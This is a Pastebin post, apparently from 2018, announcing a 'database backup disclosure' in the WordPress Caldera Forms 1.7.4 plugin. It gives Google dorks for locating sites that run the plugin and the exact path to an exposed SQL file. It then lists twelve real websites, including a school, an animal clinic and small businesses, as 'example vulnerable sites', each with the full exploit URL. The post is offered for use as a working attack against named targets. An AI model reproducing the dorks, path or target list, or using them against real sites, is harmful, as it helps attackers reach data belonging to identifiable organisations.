API tools faq
paste
Advertisement
KingSkrupellos

WordPress Caldera Forms 1.7.4 Database Backup Disclosure

KingSkrupellos
Dec 5th, 2018
196
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.54 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Caldera Forms Plugins 1.7.4 Database Backup Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 06/12/2018
  6. # Vendor Homepage : wordpress.org/plugins/caldera-forms/ ~ calderaforms.com/updates/caldera-forms-1-7-4/
  7. # Software Download Link : downloads.wordpress.org/plugin/caldera-forms.1.7.4.zip
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.7.4
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/wp-content/plugins/caldera-forms/''
  13. intext:''A-Data | Software til sundheden''
  14. intext:''Harvest Time Christian School and KidLife Preschool''
  15. intext:''© The Cradle Company 2018''
  16. intext:''Theme by Tyler Moore''
  17. intext:''Jens Wiecker DIGITAL IMAGE ARTIST AND PHOTOGRAPH ''
  18. intext:''Avada Theme by Theme Fusion | All Rights Reserved | Powered by WordPress''
  19. intext:''Copyright © 2018 Hands2gether. All Rights Reserved.''
  20. intext:''intext:''Designed by 2it'' site:gr
  21. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  22. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  23. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  24.  
  25. #################################################################################################
  26.  
  27. # Admin Panel Login Path :
  28.  
  29. /wp-login.php
  30.  
  31. # Exploit :
  32.  
  33. /wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  34.  
  35. #################################################################################################
  36.  
  37. # Example Vulnerable Sites =>
  38.  
  39. [+] a-data.dk/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  40.  
  41. [+] kirabpemuda2018.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  42.  
  43. [+] holisticanimal.clinic/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  44.  
  45. [+] htcsfl.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  46.  
  47. [+] thecradlecompany.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  48.  
  49. [+] excelsioryogasf.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  50.  
  51. [+] junkescontabilidade.com.br/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  52.  
  53. [+] wiecker-photography.de/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  54.  
  55. [+] fbclansing.org/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  56.  
  57. [+] hands2gether.net/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  58.  
  59. [+] dietsensor.com/2016/dev/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  60.  
  61. [+] ekdoseiseksi.gr/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
  62.  
  63. #################################################################################################
  64.  
  65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  66.  
  67. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!